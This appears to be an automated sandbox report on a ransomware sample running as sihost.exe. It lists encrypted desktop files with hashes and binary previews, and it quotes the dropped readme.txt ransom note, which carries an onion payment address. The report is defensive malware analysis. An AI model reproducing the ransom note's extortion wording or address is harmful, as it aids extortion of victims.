                                                                                                Malicious:false
                                                                                                Preview: Y...j.5d.@q.6..Yh..E.K..C/..J.......B....Is.{..`....7q.?4..;v........6.y^.......2Co..qh.b..`....*^...WK..F.........z/.,Q]M...3O{...a...0....vZ... .........R3u....(nD."..-..*....B...o2.....7.!.nf...BIa..:c....(.^....=.%m.v7...-/&.6O..t..jDI.7.zQO../.g.a.4..NO..r9Z.kye...9....J.A.....@.$...X..{5..9HW..4R.|..d..A.M.b.n..Jf5&.,. .U..,G..E.).q........X.Z..2.A..........^.bU.X...b.,......?F.P&"......Y@..+.i}-}......./.l....k.pKn...|....C.......,z..9...mT...N..a.8..;.W..a.........!..a......{1.SmsUcV.l.E...F}..Q..u..K.p...|.x.9.3QEq.......).l.f..../&.K...+e....A.A...*.i....K.K...P.~.....Q..k....^.-......2|[K.k :....k.n........fKC.}...2.J..Z@.i._z.......C.t. ..||...0...E....)ru6.O.~.M....a.._ p..A..}...l...|.\._.u.....KNg.u2O>j..qq.:..Z..EH...n..1.|echv.......d.c|hR+..,...N.....,-....M..|.P...j.i0!..4.r.H..N...S.~hG...... ..=@...n(.....4..qw.V.)...].Sw)1..06K....,#N..V.M.c]3.T..P.*r..)i.:!.MZz...$U..U....R..(.!..6..>2<.p*.....}..8.q.[3.Bl....P....R..6.
                                                                                                C:\Users\user\Desktop\NEBFQQYWPS.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.835601902014908
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:IzbT8SFQpA8IwrSrpOi8COEgZHjZqFYwTqOOxPV3t6MbIilAu66tNlqEy+qU:IrTFQ1I2NtMFedN3t6M0ilZPtNlA+qU
                                                                                                MD5:D55DF30939909713ED2DEDDFFA357899
                                                                                                SHA1:C6841FBBD91E42E331A95FB39B0FDAA65589BCF7
                                                                                                SHA-256:2F3ABD6CD39103DB86B1BC014A5C8D0A1E27F98AE2876FD207F4416058CCD7C4
                                                                                                SHA-512:FCC5FE352A06AC57F7681865E9A307AC216C8F27BA1099D5170E94CBF5E8E60D56A3EB8C5E54EB474F886B8F17D5E46A405F65FC3997ED7878CB8266FB513D2F
                                                                                                Malicious:false
                                                                                                Preview: ..].....;vA7.....NDB.:....3.L..[9....r`.J1.HMV'.f.^\..........n%...q].,]C`.Hn..|..tK..Y..-.w.....t.p.....`....y_..5.s.u0h.,..u....o../n}.jJ...+9..:.>.~.X>..J...].-S3.n..4"+a....bI..,.k....Sa....X.e..&Cf^.1.4f.jK........p.......'.&..&..%.r$T...}.. .:c.A..dx1}8..h.i.B..;5..(^...!....-Gj..6+..mu.'}#v'.....h.z.:............]..i...B.J.)...N....+.5*a....W..p.....!.3=.<...+.>}...{.sB"....Y8-1.^}U1.h_.......@.C.v2l7.lj...+"8].%.\.A.*k........X)..g.^....hu...7p....aR.W..E........K1..FJ...T.[.. .z.)f.).i.d:.5:)..u.s.R#..2..Ji).[.X.........5.*.~.J@...x..Y0...Ne...!..NZBIA.Q.v>.*...Y.j-....H*...$..YZa.D...c.SG..-.....bh.F}K..b...g...+.EM..K..l...J!c".m?88u...K...B.@6.yA-..<...k=c..S..,e......%qk..$mq.w$.rxH.{I{.J..6KJ_;.HnA....S\......j.t..mz.6.....n`*...N.."..p...T..-.....i.5...^....Vm...S..8...p...!..N2.6uY.7...sl)R.:..........#.Z..7.I.{.^>.......6...u.JV^..oB@O."L.8.'.6. ..Hu..1.}.J.].=..hK....9v..Us...#zX..[....."......L';h.P-.-..b.PN.{...u.r}.A45
                                                                                                C:\Users\user\Desktop\NEBFQQYWPS\NEBFQQYWPS.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.846864475436348
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:XmjfCJfQl2ox7XfxsK+rpJ2hTFfEVKUohC4PUh5tgwdaD2UrM+de/Q92jakY8:5Ql2ox7XfxsKX8bp4PItldaXMpS2jxY8
                                                                                                MD5:5E00D6515D177AC6E75D07C7598FEAD2
                                                                                                SHA1:DBBA30676022E75D4C106FA0D325DDE7EB026C80
                                                                                                SHA-256:7338AD23BC609375E3BD4C9D87D99B0EF98142D11491BE6EEBC2BD37FC01B70A
                                                                                                SHA-512:9C2A78A5381ABD704A688AB446875072C3D0C4B622DEBB2A6A87B9BF6495360EAEF84A54763B79FA727765686FD23FCDEFBDC387B3A0CA987877751A60889145
                                                                                                Malicious:false
                                                                                                Preview: ..1DU.$..\.{sw...V1'..e.?............X......a.y......}.V..-.,..[+Z....."A....5f.r.e.x...@u...cE%...s...^.......E..u....v`.f..dln.I..m8...4.:..J1..4}...*....R)T`...<...G`z.A{.1..I=....88d%....C*.m...`..m e.qn.....Z...^.mX.k~..E.."......) m..Cpd.|...*.P.$|`.0<..zqK..4...mx.........a2N...P..N.{....c)......rU..;.,..@).o...(J....Hi..7o..o.".to.k..........{..y.r.....F...F.,..B.w.`.-'..%.A.T.s...q.a..\....<....>g.,..I.$..?.....yX.......i....|.*uB..9$.uF.a.w.4.._Xrr.}}.l=.=z..$.0..=S@..Vg+.....,.D....l$......xGV=.&.n...,.E..nZ.C..90&............#\."....6Gzt...b.t/g3..K|)....J.e.......<]?.D@..%$....VH)v..td...X.$.m8.$6.../..........W1G...h.N+k...}.,...Z...x0..R..o..=..p...g.@Z.....^.`.Mb...)..W.q&..tQPyv..N8.L...+_. ....I%...I^(.E.2..U..l.?.V..q.....U7(.:x,.....p..%.kV....9..3.M*...o...+T{.......z.eB.5.:6|cg|...A...F.....d.6..B*.."...(.(.b(.j.%.z.Hf%!...fj...7......r....#..Y.F...p.....c.a..........dh.{A..c..U.q...]...y..O)J...?.XuC.n."...@.
                                                                                                C:\Users\user\Desktop\NEBFQQYWPS\PIVFAGEAAV.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.827330828949177
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:mZRpEqR8AlPf7MCUH8w/hxH2+9VU0oyFWdwPSCbq4qVtJPDozxC:cRpEq5tfPUHNZd9+s6d34Y7LoNC
                                                                                                MD5:D7ABAE0AB239C4F1EB1219B2C3B1EB39
                                                                                                SHA1:E27A2E555036573AA7C147C52A7F4E63ECAAAE69
                                                                                                SHA-256:E194010311482D37A679DEBCED88BA8F76ECBB3F8EF0EFDBA2D45C44D7A82E81
                                                                                                SHA-512:1923952D5007AF6F59B329C8808D26E19516FA13B7ED917E8F09B3B0975F200A7F4F2A26564B10440DDE036869A418C7795DDCAC910C0DD2CDD05DD74F5C43B1
                                                                                                Malicious:false
                                                                                                Preview: ...|../?......SY.....H......P.<7_..M`.?........!...#.B0.L8E.0..x,........^(v;V....ytHd.>.T.X...O`W.HO.CV........d.u.33Y.\..........|....N+~......].p..4.....L.=.5A..`..LQ7.....L.2...T..A.......+...K...S...Y.=.....*......z9...a0.m.v..`.z.E..y...0-...Tf|...x@....Qm...1..e/\T..&.;.x..U*.:....e..).."..Z..........E...l.K.Nn.q.8j.l...E..,..p.^Nm...15.m./.,,Qj.}..T}.......9....`.{...A.Gf=2...........T0%..kd{U.0.T.M.3........n.-U.j...w=.y..p8.k!.7;..#AF$.V7A&.8........8].;.@v.0......9GTB.}..B..PO..H.......;d.k.;O..V./..H^....s..n1".G.uV.i...g,...c.-..=.I.. .a.&.TD.K......2...YB..W..>T...y.tv.*.m.6#\..D......#...MX.'a..1...7..o.PV...j.M..y!....>.%.,........l&.....x.._...d../?7. ..QG.I...>..3...&nG.E.y..{4.;.."..?R..a..T.rO0..'...}..b.h...Z5.....o.d&.".Y..z....k.'..D.|..#.Y...Tk...Y.}.H.jx....&.....t..tB..x-.9.8.M.k2F&...e.+....uj\.F.....!A...M'RJ?..C...<.......^jj..>.!.G'.Q,utp...R....ZW..R">.5...........b..k.........q.i.<x|.>.DR...Q.V.._.I......:..>
                                                                                                C:\Users\user\Desktop\NEBFQQYWPS\PWCCAWLGRE.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.864252108899856
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:IIBMej1Ed5QebEvUEcHv3CM0eWx5B4YUI8nLx56e+IzM2T1j1:zX/egvHcUOYL0ASJT1J
                                                                                                MD5:9E6EBEE0DB2AAED39D107791056189D4
                                                                                                SHA1:1DA4E11F3B7F00175D538D7E5B81926459A5E718
                                                                                                SHA-256:6AFFF6182725EB234D3CB86F505F05C72AAEF62D6F94F8DB5C655C2575A4DE9C
                                                                                                SHA-512:677035F101DB2CF79C963680B61BBD832CAC3451E9D9CD364B44283CDBBE31179B7742AE6EA55473E1FF8D6136DED7283D8C1F8C38A121F3672ED9EEBA4D9118
                                                                                                Malicious:false
                                                                                                Preview: j.t...m...HK.+b....y*......\....[.TL.RO.f.g. ..e..&...+t.....h.........u.....M.g.j....,P/.).7U[O.M....pu.l..........S........t...w..^.r.-........S....q.C.^.......~6..T.:R. ........D...F..bE.i>Z...L.C..F...&/.QaX..~.k.8..C4$p..R...c}t.....I.5c'.3`.E.KB..:......[ ..}u..r..q+D.....|6.V~!.$.UJ"......Q.Q.<l.._.v}h.......m.a.8iD...<.z/.j..O..P%..........)...FKpk..wl. ...c...I&.X.$JY.M_.Q.2...;..........){.b....zL.r..2.vp.v.....[.!...*....'...qTm............2i......A.FHN.^5.H.k...ZO.`>E.k.I.q...yi.ve8.....4|.7....2.g.+5.............]^.n..<.<1.]uuQ........m..y.1np=#....Mw...d.N...cF.....Pd....<..o......vu...O^.g?.Z$.j'+...N.A.tN...g..k.t.m..CG./!f...n....9r....l...wB....{5...%..k!V.o...D..?c].M.L.T......qj1e...;.e....&..U3.5s...I.ozE...i..1.%y}.m0..~..(;......d<.3....gA...N~.(.L...9.e.K...a..K...B.......d...^.I....#Vb.T..Z...N.0..]..(V.....G.5{0.|'..V...S.....w.0$.0..n.. .3.F.m....[..v.GH....C.......\....?2Y........B..q..).Y.....J.....@..(
                                                                                                C:\Users\user\Desktop\NEBFQQYWPS\QNCYCDFIJJ.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.841051260600155
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:QT3yyIyNryiN37Q1xB3R0+pblyWJCpwo9AwlvxV6SOA/C8KMnNOywm//i:QCyIyNrx1kjBnto2W/DV6SZKMNy
                                                                                                MD5:54777401F8BCCF1492B26A366A1DDB85
                                                                                                SHA1:2C4FCD8C2386B89C44DC2BA2BDDA7F63831935E9
                                                                                                SHA-256:B486A6860513DCCF6C62470334B6AE3FF13B4AACDDAA9B24146404F981A3A1B4
                                                                                                SHA-512:B4DC85E149E6FD4518608D155B85F20F0890E08E71375305BC768D0C7FF83C50509FCA270CEA30841184C35EBD57267639619168230E9A09EBF56DC31A5C12FF
                                                                                                Malicious:false
                                                                                                Preview: .X.Y.A...~.{.D.tR..gn%.....K.F=.=. ..=x..G ].Y....|`..Ez....lQ..j%...a......9.:...f.>..A..06w.E.S..`..U6.3y^..... ..j.. M]+B#...F.o.q...5...f.F..~.t.s.V..W.e..V_..K..8w&.6.r..q?.4..Zs..r.\6.u.I.I..&9.8W.W.s..,..G.W.._..}.r.....:.]...+._-.......Bk.#.....%..........y.."...X.Sr...X5#...a1..x...J.W..........oJ.Y..s..%.ZpR.l.._#......".....p%.]0.A+.%f..oo<......&`..W.j_).N......<......YM7I<....E..X...Rn.e._q.......d..>..,..K.g.,.B|..zaO...@.....PIb.0.L.g#..07ey..Dj..Kn.....[..WF.2)..v+....t.@+..h>..i......p..[_....+@YZ.%.R.%.j;..>..?.8.../.4....'........:...x..1.D,.......SA4z....7w..D.4.KF..>....>.g.Q..u....Zu..P..g..Xx..^.....C}...u;......H..dK.*.....z..-.D...{.IH.*.@]L..#y....rBf$...H.~...P........t......oP...d.y..q`...Y...3.dO..2.28V...N...W.lP~x.W.u....F...e3..Q..c.e..v...%&...ajK.SzH......H....Z..H.'Y.i.s...^...Z..0.&....."Ya&.(...%.w...w..`<C.m.........y.Pv.n.J ..(....I......E,RJb.n(XQy.U...L.Y.GlWD;.o|.....#.....n5b....:.....L..0..{.2..^.7...I...c..W.
                                                                                                C:\Users\user\Desktop\NEBFQQYWPS\ZQIXMVQGAH.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.870832570390251
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:d1585FS6BYwAbMJPYSKdC2F85BtQCifa52CQzCXdKoXLLR5dK1vkJ:x8DYov0CysQKzQzaJ7OvkJ
                                                                                                MD5:59EDF8FB74ED3150CB745854A75A7118
                                                                                                SHA1:D02CAFE3DC0846A724A6F0C2BA61AD4748542BE0
                                                                                                SHA-256:2D7444DBF54A306019639F8BF83C78631A321F2D8BB5CD0AF57B6343AB63EABB
                                                                                                SHA-512:5CD4E894DF060EE75D416F20F7813333C7F72BF896A8E0614C43F7B0E372B0958F9B4903BAC1E56869E9D521E2FDDF002B9581461C4914CE2E37E1400785849A
                                                                                                Malicious:false
                                                                                                Preview: H_U..eg.......[2.0...P,x...,...-l...... ...x. ..[...Q.}7.e...P...8...n....4g...@l..`-...+...O"..n.4..t.>.>7Z...aq{c....g)mc0..# ih......;N....T.s..P....J.1.r.AeCek.&H.2...Z....M.m{...h.2.(I.JX.9?..:-P<.M....X..QZ.[.1y.Jw.v...Z.....+<....3......'bI..sX...9.Y.eB'...s.8..o2...jOB......T..;..\...F.......(.y...L.,...?v;8r5..6.....t.3=....>..{......p.4|O.....f..`.....T.<.YQ.j.o<Z....4.p.\M./x...,]@.0;..B....-.|.E...!....i.../+. u,..h...&j.>...N...z4a.f.n#.O$...|GNdB.=.pmw.... eD.P..4..u..F}.DnG.mP..n..]Y.rS_.h......<X....:...;TN.K?./..@7..0U...e..........= t..M..B..H..9[x.C.>%M"_..<....W.".h.R.~.{-..Vk.......s..$].].....As.....'G.[a..ql&...o.zF....t..5..R%n=.`d3..".YG...l.y.t...v.e..#......i.VLI.j$.*.FE..>...])5}0..yJ.;..I.:W.B5.r]:.*..Q.X.0Z&.iU...X&. .c...i......O..a.?".Z....o..BE.o.....o./?l. .....8.f....~.._.........R._.`2..I...........pL#....Z.wX...dz|m......!M~.a...`4F..k.;}-.z.X96....;..6JgO......Mq......h.p`....D.bv.I.!..3.$...'.....j...H.[
                                                                                                C:\Users\user\Desktop\NEBFQQYWPS\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Desktop\PIVFAGEAAV.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.834415972656961
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:tCrOsyTQzXdst++lkIJi9t046PgPoA7ngzBrk/TgVD2b8k1nTZ1BF60x:tjsyOXdst+JUq0zPgPoMnaBYLgB2Y2lT
                                                                                                MD5:3484322AFD55169086A10C98963E65B5
                                                                                                SHA1:993AD2566BE41442F6D53872BBF3F121FDC0ED8F
                                                                                                SHA-256:C21553F1A8AD14E098D840286A6AC28E5354221C356768862C9EBD0DDB7AFD73
                                                                                                SHA-512:835774A601CD7C22E624C35757570A8F26FB717AB658D8A563245746B608E4716CA39CCAF8F14FA2266C6BE066136A11881673934622F2CDCC208C60FC9A080C
                                                                                                Malicious:false
                                                                                                Preview: ..{..-R.^....Pi...8@..y..Y>pckc....^.v....M..n.h.CCh.+g..^n."P......G..-}..$y....v...|.E.J..7............c3R..hZ...u...o...........Zi...!ZeK.9...A.r6=.<..9...Z.}m[....M./...h.-....3.p_aE..a..p[tKE...'k5v....\a.Ys.|..D..!.. Z.aU:.$m.D.s.caU..LD.......[...B.:.B.W.C....1a+.Kl..FU..S0?../..\<J."D.;]...%Y..9Mc...-.CRh.J(.l..Ep../ZC.....m....|.y~... :PA...B..O[W.$.]U..h.P..|......_hl..*d.F....... ..5O.k_..PSa.z..s....2....K+].>.O..XN._).~.i#..r...)...A/...r}.. n.....xp....V...nb.'*....Nu.VD..........j Cm,.z.w....8>I.....\...t;<....]......&.......R.k*.0y.]T...n..).v%... ...chQ?.9..L..L..9........A.......|s..3chh..w..;:.....2".l..:..4....pf......b.w.V..A...J.."Ock.|f...s...nEd.j.....u..3....#.s.\..%,....J.U..u.xV.....n._Hxi....!n(......n.....).;9?...`...,.U.....4..b...9/r.D..j2.W...Ww..AL.Z)+x..F..Y!m......t...8....:.U.Y.......~...BJv. 6/....".R.2.m...Ss.B0]...1.}...[..Y...,\.f~?N...b...5x.Xn..)..._.....w.+...-....m..>...O.........
                                                                                                C:\Users\user\Desktop\PWCCAWLGRE.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.8705854174526815
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:DlOH0NauS3P5vBtQnkR5SjtfKAYQWdeBGtdE8nPGkoC/5F:DIu7o5vBVnS5SAYC9oGkoUF
                                                                                                MD5:C1B4967CFA817B7B5B24D40EA231FE00
                                                                                                SHA1:55CA94B4BD1E447B8E33D94A4F260DE2AE5E0FEB
                                                                                                SHA-256:E02174ADF75A5F2C8E83253EC9BDAF71800153E4AA54F1038DF40B7F06D8AF78
                                                                                                SHA-512:EDEB21429D82649711F887FFFA8A6DF30D4AB6A3A99B97C224890ED3A44390258F170D5514395FE32226F167FD270D58B1F0F4572D23052E3909B36C79920BC4
                                                                                                Malicious:false
                                                                                                Preview: A^Z..ea.......o".*....<$.#.Ia.a.F..7w3..i...../s._l,I9....W.....b.y..s%i..q......Y.....\9im....^;....5..d=IW..WTP{.....P@..V....wZ...i..,.J..&..m....}i.c.O..tQ.....;.,m.V...../#...**..H.\..#a...])...q.<...R.*<.b..+...U.D..G...$W.ER.......j....`!4.rh.6...4.?.. ,..D......xqL..=.g.0.2<."m...+..M..B..=ESY.wS......U.M....r.......I.....f3Gq........(q.....av.*o9(...aI.../...A....m....Z.$O9.rQ.h..|.bE.../lV.+....c.......N&,..b..!g.....4e.;)..m.j.S.`......3E~.>.=..=.2]L..(.>.".......?...w.to..z..A./.+.+..G..i3.}Y@.f..T<.8K.HS....i~.r..Z.~4....ueH.....y..?.pjX.9..^.m.=1|.........{a..o....[...k{..I.UpVK:....=.w....8..j.A{.]1...6y. .......s....&.i...h.e..|..G3<jC9......;)...L:...'Y..r(q...'..X-..KA.?...h.....w|.\ .N6..D..n.d..a.5...!.0`0..S.>....n....(.z..WP...w..z.t.P3I'......rAwu......m..V(A.0....^...|+.B.....A...Q..N.p...+e.3\.%7..J1.g(.1..m...L..Y."...s....!m......}..xb.pW.Em..pD.pl8pH'Xh....?:..a..k....gj......9.n...g.....,.T.'.*.s.+.)..
                                                                                                C:\Users\user\Desktop\PWCCAWLGRE.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.859599967144636
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:alr2HB5rFm2iO1WfibT9N71RYdrAWxKJ7fZA7G+2xpArjj1PZw29rzZ74p:kqh5rBi8WG71OJA0q7fWy+Qmrv1h99vM
                                                                                                MD5:7B8FB60C744A3D87E1D93283184934C1
                                                                                                SHA1:C49D0F700471053B53751F268A9378E7E8CC6EA6
                                                                                                SHA-256:96B24A051D00244A4C250775975F3A2CBC6F2C1F468E407EC6AD36BD23D5A0D2
                                                                                                SHA-512:434D59BD43A2DC67B3C03772F86355BF5EFE4BC1CBDEA908C5A4BE620BE5477E525879FEF4E6BB4F47BD27CA649611928C0BFC1B74A4DF53AB665A8E11DF7EB6
                                                                                                Malicious:false
                                                                                                Preview: .=...`..+..k..g.p..r_...gV.9ZC.LU...7(.~..=9x.._E.`..O..I7<.r....^3J.*...O.....7.9...o73.......B^c.C........5.6.|5....k..,..*+...kJL,...Gz..e..P.A..P....s.2....!....Jo.[...Q8....L....!M..1.B../...y(...>&.g.u*Mk.......yHy.4{.O-{.+)XqY.EP.3!.?-.j.{....i.......Q ..".Qj...........w...y....i...@.(.....i1.......g.I7....v..E!..*H.,4.I..Q[....$..~.......'........b.A.....K.... .&w!.M;.j.......Q.....iB..wq.L.~j.gr.(...gN.....&..c..P..~.m.:...0..T$.....?..6.S.^....Tx.....jP...v. a..."(.n....b>q.D.W........(*...t.2Z..&...........hVx.....`.B.r.....$..q..d.7.(n#e..N......`.e.V........=.....H....r}vd/g....o.....D.n....B...G.......-......qc.........I..i.^........b..y.....s8.....~..7./..... ]..VOW0.}O{../..5..^...M. O.@$..{~.=....KnC.a.;.........L.....:...B.(~....M..[).pI.WA.q.2u.F.z]. ).......D^.........+h..z..)x...8oc...s.6o..{&....J...{..3.l.q.JS.J.4..rf......H...a......\,...c.:.p....c(bDa..Mm....._B..z...J}......s..[.f'....Q...;0.n3...u..G.}..
                                                                                                C:\Users\user\Desktop\QNCYCDFIJJ.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.844867565166824
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:p4PzJOV20EroQcG9JWBx8o+66oDqal0IkPYEmdVVaP6G8JDmwBxzX:pOJWBt+66oDqaSPYnVoSjvBxT
                                                                                                MD5:E337F27E05B52FE9C7B1726416ADA1D6
                                                                                                SHA1:9837CD0CAC2E1D3BFC10D0D561D6652D9AD33DD4
                                                                                                SHA-256:46CC40AE4C09A58DAD8366D4AC29EB545B959FAC72E88438D806AE627A681A3E
                                                                                                SHA-512:49336A60BF82514DCBBE0F9565E31623F92340E03BD9FF8EA0E06029FF5047F5500897267D06A2AFE3866311AFA2768263C3628979C7FE0F410562B9944B3218
                                                                                                Malicious:false
                                                                                                Preview: ...\...|..(KN......? ......E<.....M3.M^. y"!&"..kL(.;....|G.....-9.d.d;X..Q....h...!.{0v.Ch..I(.x*......WZ.s...#.k..l...a...ax>...|Ce..[....=...Q.).o...I.B...sb.3Zn......l..Y.]W.]m..s.ki....h(..9.L....}a8...G@]..l&.?iq.T..F.[.....{}|...!.lk...c..on........J.?..I..1]e>YL.;...:.....n..L..p9z.G.;..E%...".y..w..M....'........~......?(..e.va.Q9..@De0.y......y.....Y."....u./...p.~..e.../.....]..&..8..I..f...-.%"..U3._b.@z.....(I..K.+.#F....Y!.UIv.......w<..^.l......#.....mt..*B.j.Y5.......s.#{.g.q~(o.......3.......j..l..D.....n..........:.....fq...3.s.J/.S...........'......nGJNFB....bn....Sz.N"..IoU.x..[m:R..rk.&2o........+.-...S=.L...a.b.B...\.ZUD.%sl..3.5.. ...;...:.t..$.X...6...x.r. [..u..q.......8.......N.:.3..~...3.....9..k._......r....n...G.e{(.M;...e.....P..0h.Q-.z..|.).xU-...GQ.a....v.6..sw*...c../.Y../A~Cy...n..=QQ..K........XU.`V|.t...v.c6...:.....V..........!..U.:1_d..h..e....hQ<.#..4..^...n....3(A...JL...N.O.....
                                                                                                C:\Users\user\Desktop\QNCYCDFIJJ.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.867210826870153
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Z+vL3dzRQl3vz4qGJ5GfK/siF5F0e++HfVOMcrrCDp:Zm3dq5vbGJkfHiN0n+/QMcrWDp
                                                                                                MD5:2E48C41045D9D1258256681D24CDAEC0
                                                                                                SHA1:C502C49022F8D306447CFA093E064B02130C2472
                                                                                                SHA-256:0C6DC035CF9991D2A100FEDD0B39CC4E9B052A356FDB3649AE2A123AD1D68CC6
                                                                                                SHA-512:8D2675400D25D8DA2233B6A9DD500341776A42F0DFEF29C837595E752704FF96CDC6CB01736DF3D4B9E029ADE1E3E77315ECDFB65AC53D99B09D443E4D5253F5
                                                                                                Malicious:false
                                                                                                Preview: ....Q.K.S......i.#"...t;.{...C........6wZ.B.7.7G..6M..HE..[.&....*~.....Z.......7.2b.=...(.^0C....N.'R.k.i._A...Y..lQ.......q...........4.X.?..vu.T{..D6.*.\yDUn0=..........Lqo:Z...?.#...N..Cz(...LvJ.ZR........6b.R..cC......dW%.s....m.....P..........M8$....>..m...A..K...rlf....ZV.'.8..r.'B...f.0.M.....#......oh....._.....$.0.....#.f....1\`.k....T.%+FFs..5Ps-#...8w......>F.......c1'L.U..v.C}.X.(../..a..:4@.8.9-4.9....rb...bR......Ax._..n.....B.3C.poG@Z...\.<.".].5>.i.Y.Y.!3.b.....z.O..Xp..q.g.....u....=.."..fl*....3...1<..\X.8..{B.3...l..#&&.T.A.'q.um......L....OpT...].;*&.f.. .c...$OO.."n&.....M@p.^.$...&...]..e..55....4rk9P....e.Z.VD.n..y.=........U.F.I....."...|.8*....@.H......K4D...C....9+...}n.... ...@...d..y...U....j.W.R..Y.q{NN=U.,.=}..0...}U....i...P..ic..l....h...T>.B.l]...%d~ls..q.W..K....E._...y.X.=st.n.U"J...%....O.._.........O?l-..v3....p..Fq.i...c.....#."J...M.R...f..9.......{.{.....gX._M ...}..c......T=.)..E....f*.I...2c..~
                                                                                                C:\Users\user\Desktop\SQSJKEBWDT.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.839972734745566
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:bXW7+NPmLeaB3mctydUMzvRLt6liQnZ8Iv4YRzlZnWJ91c+xC8MbdeFWE6l3P6hh:bXW7+NuKaB3TCjrBt6li3INnnWJ9/T/J
                                                                                                MD5:77258EAE7BA27570E1D90A42197CA1C4
                                                                                                SHA1:F5886D427DB77138AB60A8E7959897AD4B71F251
                                                                                                SHA-256:61EDD4FFFC97587671A115F68F67ECFE29527A3C672A115243BE312B7AB83F13
                                                                                                SHA-512:30304F91FB6879F018E3F065D66975F78ACE5ECA28283936BD437168AC25B8724496A1E07F769290FC952D69D4E17EBB9D48464BF01E72990355A2015064BD4C
                                                                                                Malicious:false
                                                                                                Preview: ..U...IF..N.*...p@.u3|...........]....p=lmt.....$Qm...Q...2"..J.3.].<fi...5...'...z^...q[E.'.$_..5._..N.7-.x......... ...TK0..F..q..?......#G..i.......Q..n|.Z%]..=#=.)...l..`T.....OZ-...H9.=~(..?%8..p.h..u.)..3....,...!V..Ak.DD.....1...Y....ws..#;fEP..Or.P.c.M.0<Y.y.:...T.....Kz.d......L...c.....Y..a@.O..;/077.PK..".QM...?....H..[..w...._.Cu..!q...#.fO.ky..e+I.x+.T.K.s1d..J8..=9B.....fG..../Z.}.... .. ...;0.l.f....e..$L..E.GpG..Y....5...A..s...a.c4"./`.Y3b7.f(.b..1....s.-.....F.Q.b....w!.>.Q...#........?...V]h.. ...$...q.}.#Ai../.v.....[o.P}.A-F...atX...X..k....z.6..<...7.>.E.iYs...9H...?....!..(g...w..A.p...42H$A.@8..F......y.;...i.N..2.8.hx...=O.(LU.. ...(k=.....p."....$....[.a....MA..L...../.:hQ.D<.~U..<......C.....1....%.Vq.ji..;..dZ.7..o..Z.4.....L...c.W...7.GB....s.U........jM.a.Yo...............N.o-.~..cU+8..$q..`...#...-.gKi...I...<.]6=...lm....kS..q....ee.....\.3...L".....w...e...Y...l...r.+.6..[....h....L.rOc.Q.EzA_....E.p.....J..
                                                                                                C:\Users\user\Desktop\SQSJKEBWDT.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
